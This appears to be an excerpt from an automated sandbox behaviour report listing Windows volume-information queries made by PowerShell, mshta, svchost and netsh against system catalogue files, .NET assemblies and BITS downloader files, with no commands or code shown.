      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation (23 consecutive identical events)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation (31 consecutive identical events)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation (2 consecutive identical events)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation (2 consecutive identical events)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation (12 consecutive identical events)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation (3 consecutive identical events)
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation (2 consecutive identical events)
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ | VolumeInformation (2 consecutive identical events)
      Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
